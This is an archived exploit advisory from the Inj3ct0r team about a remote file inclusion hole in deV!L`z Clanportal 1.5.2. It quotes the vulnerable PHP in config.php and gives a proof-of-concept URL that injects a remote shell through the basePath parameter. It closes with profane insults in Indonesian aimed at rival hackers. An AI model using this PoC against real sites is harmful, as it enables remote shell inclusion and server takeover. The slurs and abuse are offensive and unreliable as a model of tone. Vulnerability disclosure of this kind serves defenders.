Security Advisory: deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Pars CMS SQL Injection Vulnerability
  Zigurrat CMS SQL Injection Vulnerability
  Ananta Gazelle SQL Injection Vulnerability
  [SECURITY] [DSA 2016-1] New drupal6 packages fix several vulnerabilities

From: Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date: 15.03.2010
Subject: deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

==========================================================
deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
==========================================================

[+] deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0 [+] Site            : Inj3ct0r.com                                  0
1 [+] Support e-mail : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: http://www.dzcp.de/downloads/?action=download&id=131
[x] Code in [dzcp1.5.2/inc/config.php]

## REQUIRES ##
require_once($basePath."/inc/mysql.php"); <--- RFI

function show($tpl, $array)
{
global $tmpdir;
   $template = "../inc/_templates_/".$tmpdir."/".$tpl;

   if($fp = @fopen($template.".".html, "r"))
     $tpl = @fread($fp, filesize($template.".".html));

   $array['dir'] = '../inc/_templates_/'.$tmpdir;
   foreach($array as $value => $code)
   {
     $tpl = str_replace('['.$value.']', $code, $tpl);
   }
return $tpl;
}

[+] PoC: [path]/inc/config.php?basePath=[Shell]

[+] Solution: Change php.ini and set allow_url_fopen to Off

[+] Fuck To: Buat loe yang hanya bisa main loncat-loncat indah, mau ngaku hacker loe anjing. bisanya hanya jumping server.
            dasar dodol loe anjing gay. ngaku hacker bisanya hanya loncat indah. mau jadi penari loncat indah loe anjing??? wkwkwkwkwkwk
            Gw atau loe yang merasa tersindir anjing??? Ngentot aja loe. Main balon sana dodol.

[+] Note: Kalau gw diajak gabung ama FO nya inj3ct0r, loe bisanya apa anjing. Tunjukin kalau loe juga bisa anjing.
         sayang loe engga dihadapan gw. gw lebih seneng berantem secara langsung. ingat gw baik-baik

# ~ - [ [ : Inj3ct0r : ] ]

test server